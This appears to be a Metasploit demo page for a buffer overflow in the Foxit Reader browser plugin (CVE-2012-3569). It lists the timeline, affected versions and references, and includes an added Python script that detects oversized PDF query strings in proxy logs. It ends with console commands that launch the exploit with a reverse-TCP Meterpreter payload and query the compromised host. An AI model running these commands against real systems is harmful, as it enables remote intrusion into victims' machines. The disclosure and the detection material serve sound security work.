Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo
Timeline :
Vulnerability discovered by rgod on 2013-01-07
Vendor public release of the vulnerability on 2013-01-14
Metasploit PoC provided on 2013-02-12
PoC provided by :
rgod
Sven Krewitt
juan vazquez
Reference(s) :
CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin
Affected version(s) :
Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier
Tested on Windows 7 Integral SP1 with :
Firefox 18.0.2
Foxit Reader version 5.4.4.11281
Description :
This module exploits a vulnerability in the Foxit Reader Plugin, located in the npFoxitReaderPlugin.dll module. When the plugin loads PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).
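A detection-side illustration of the condition described above, added here as an example and not part of the original post or the Metasploit module: it scans web proxy log lines for PDF requests whose query string is unusually long. The log format, the 512-byte threshold, the function name and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumed threshold: the description says "overly long" without giving a
# length, so tune this value against normal traffic on your own proxy.
MAX_QUERY_LEN = 512

# Assumed log format: combined-style lines whose request field is
# "METHOD absolute-URL HTTP/x.y", as written by a forward proxy.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"'
)

def suspicious_pdf_requests(lines, max_query_len=MAX_QUERY_LEN):
    """Return (client, host, path, query_length) for PDF fetches with oversized queries."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("url"))
        # The plugin handles URLs of remote PDF files, so only PDF paths are checked.
        # Limitation: PDFs served from paths without a .pdf extension are missed.
        if not parts.path.lower().endswith(".pdf"):
            continue
        if len(parts.query) > max_query_len:
            hits.append((m.group("client"), parts.netloc, parts.path, len(parts.query)))
    return hits

# Constructed sample proxy log lines (not captured traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2013:10:00:01 +0000] '
    '"GET http://docs.example.com/manual.pdf?page=3 HTTP/1.1" 200 48213',
    '10.0.0.7 - - [12/Feb/2013:10:00:09 +0000] '
    '"GET http://files.example.net/a.pdf?' + "A" * 2000 + ' HTTP/1.1" 200 1024',
    '10.0.0.7 - - [12/Feb/2013:10:00:10 +0000] '
    '"GET http://www.example.org/search?q=' + "b" * 2000 + ' HTTP/1.1" 200 512',
    "line that does not match the expected format",
]

if __name__ == "__main__":
    for client, host, path, qlen in suspicious_pdf_requests(SAMPLE_LOG):
        print(f"{client} fetched {host}{path} with a {qlen}-byte query string")
```

Only the second sample line is reported: the first has a short query and the third is long but does not request a PDF.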
Commands :
use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo